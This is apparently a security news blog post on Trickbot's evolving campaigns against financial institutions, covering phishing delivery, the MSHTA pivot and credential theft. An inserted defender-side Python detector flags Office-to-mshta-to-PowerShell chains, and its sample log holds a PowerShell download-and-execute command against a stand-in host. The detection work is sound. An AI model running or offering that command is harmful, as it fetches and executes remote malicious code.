DecryptedTech

Wednesday, 06 July 2022

Trickbot Evolves as The Developers Target Customers of Multiple Financial Institutions


Researchers have identified Trickbot in use in campaigns targeting several financial institutions. These targets, along with a few tech companies thrown in, are predominantly in the US, and the attackers appear to be using an evolved version of the malware to get in and avoid detection by legacy, signature-based anti-malware. It is usually delivered as part of a targeted spearphishing campaign in which poisoned Office documents either contain links to malicious websites or contain HTA code that executes a PowerShell command to download the second stage of the malware.

It is a nasty little trojan to begin with, and many companies were caught out by it because few anti-malware solutions were really looking for the MSHTA pivot it included. There are still far too many solutions that do not see that pivot and instead rely on detection signatures for the malware payload. This has led the malware developers to start working on additional techniques to avoid detection by those solutions.
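As an added, defender-side example (not from the article or from the Trickbot operators), the following Python walks constructed, Sysmon-style process-creation records and flags the Office document -> mshta.exe -> powershell.exe chain described above, which is the pivot a signature-only product misses. The record format, the process names and the download cue list are assumptions made for this illustration.

```python
import re
from collections import namedtuple

OFFICE_APPS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
# Command-line cues typical of a download-and-execute second stage (assumed list, not exhaustive).
DOWNLOAD_CUES = re.compile(
    r"\b(downloadstring|downloadfile|invoke-webrequest|iwr|iex|frombase64string)\b", re.I)
# image holds the bare, lower-cased executable name so path differences do not matter.
ProcEvent = namedtuple("ProcEvent", "pid ppid image cmdline")

def parse_events(lines):
    """Parse 'pid|ppid|image_path|cmdline' records (constructed format) into ProcEvents."""
    events = []
    for line in lines:
        pid, ppid, image, cmdline = line.split("|", 3)
        events.append(ProcEvent(int(pid), int(ppid), image.lower().rsplit("\\", 1)[-1], cmdline))
    return events

def find_mshta_pivots(events):
    """For every powershell.exe, walk up two parents; report Office -> mshta -> powershell chains."""
    by_pid = {e.pid: e for e in events}
    hits = []
    for ps in events:
        if ps.image != "powershell.exe":
            continue
        mshta = by_pid.get(ps.ppid)
        if mshta is None or mshta.image != "mshta.exe":
            continue
        office = by_pid.get(mshta.ppid)
        if office is None or office.image not in OFFICE_APPS:
            continue
        hits.append({"office_pid": office.pid, "mshta_pid": mshta.pid, "powershell_pid": ps.pid,
                     "downloader": bool(DOWNLOAD_CUES.search(ps.cmdline))})
    return hits

# Constructed sample: one malicious chain plus a benign cmd.exe -> powershell.exe admin run.
SAMPLE_LOG = [
    r"1000|500|C:\Windows\explorer.exe|explorer.exe",
    r"1200|1000|C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE|WINWORD.EXE /n invoice.docm",
    r"1300|1200|C:\Windows\System32\mshta.exe|mshta.exe C:\Users\u\AppData\Local\Temp\stage.hta",
    r"1400|1300|C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe|powershell.exe -nop -w hidden -c IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/s2')",
    r"1600|1000|C:\Windows\System32\cmd.exe|cmd.exe",
    r"1700|1600|C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe|powershell.exe -File C:\scripts\backup.ps1",
]

if __name__ == "__main__":
    for hit in find_mshta_pivots(parse_events(SAMPLE_LOG)):
        print("MSHTA pivot:", hit)
```

The benign cmd.exe chain is deliberately not reported; only the full three-process ancestry plus the downloader cue raises a hit.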

One of the primary functions of Trickbot is to steal credentials for use in obtaining further access or to exfiltrate data. It does this through a Man in the Browser tactic (T1185). It can also gather information through other methods, as the malware acts as a dropper. Researchers have observed Trickbot used to deploy ransomware and the Emotet Cryptominer (I have seen this one firsthand). Trickbot has multiple methods to maintain persistence on a targeted device. It really is like the Swiss Army Knife of malware. According to CISA:

“TrickBot is capable of data exfiltration over a hardcoded C2 server, cryptomining, and host enumeration (e.g., reconnaissance of Unified Extensible Firmware Interface or Basic Input/Output System [UEFI/BIOS] firmware) (Exfiltration Over C2 Channel [T1041], Resource Hijacking [T1496], System Information Discovery.[2] For host enumeration, operators deliver TrickBot in modules containing a configuration file with specific tasks.”

Trickbot has been known to spread over SMBv1 using captured credentials. This is not that much of a concern, as everyone has this disabled, right? It also relies on several pivots that should be disabled in most environments, and even in the consumer market. The reliance on malicious websites, documents and even SMBv1 are all things that should, at this stage, not be an option for attackers. Clearly there is a lot more work to be done in the security world, as this type of malware continues to flourish and be effective.
